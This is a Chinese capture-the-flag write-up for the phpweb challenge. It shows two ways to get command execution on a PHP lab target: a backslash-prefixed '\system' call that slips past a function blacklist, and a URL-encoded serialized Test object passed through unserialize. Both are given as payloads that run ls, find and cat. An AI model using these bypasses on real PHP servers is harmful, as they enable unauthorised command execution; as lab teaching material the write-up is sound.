| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> [网鼎杯 2020 朱雀组]之phpweb两种不同的解题方式 -> 正文阅读 |
|
[PHP知识库][网鼎杯 2020 朱雀组]之phpweb两种不同的解题方式 |
目录 ?
访问靶机,观察页面,开始时首先加载了一张图片,随后刷新回显时间,并且网页每隔一段时间会刷新一次,频率大概五秒一次 F12查看源码,和观察的一样,setTimeout("document.form1.submit()",5000)每隔五秒钟将会提交一次form1,然后是一串时间字符串2021-10-20 12:14:50 pm 注意:重点是靶机内的form1表单,index.php用post方式提交了两个参数,func和p。func的值为date,p值Y-m-d h:i:s a 分析:接收到func和p,执行PHP内的date函数和格式化的Y-m-d h:i:s a,然后输出结果。既然这样,猜想一下在PHP内,执行$func="date",肯定是没有问题的,但是如果提交的不是date,而是system,或exec呢?
构造测试paylaod:?func=md5&p=123 做个代码执行?被拦截了,可以fuzz查看哪些函数被黑名单 这里可以利用file_get_contents获取index.php的源码,如下:
果然定义了一个disable_fun,然后巴拉巴拉一堆黑名单,代码审计
方法一:首先判断是否存在与黑名单,php内的" \ "在做代码执行的时候,会识别特殊字符串,绕过黑名单 payload:?func=\system&p=ls /
payload:?func=\system&p=find / -name flag* payload:?func=\system&p=cat /tmp/flagoefiu4r93 方法二:这种方法就是大部分答案写的反序列化得flag手段 首先看下刚才index.php源码内的一串代码
如果用反序列化的方式调用system呢,提交的func为unserialize,p为序列化后的字符串,然后反序列化test类
构造查看根目录的payload,由于以p提交的为序列化内容,func需设置为unserialize: ?func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22p%22%3Bs%3A9%3A%22ls+-alh+%2F%22%3B%7D 然后就是构造查找flag文件的payload
最后构造查询flag的payload得到flag
?func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22p%22%3Bs%3A22%3A%22cat+%2Ftmp%2Fflagoefiu4r93%22%3B%7D |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 | -2024/12/28 13:52:22- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |
数据统计 |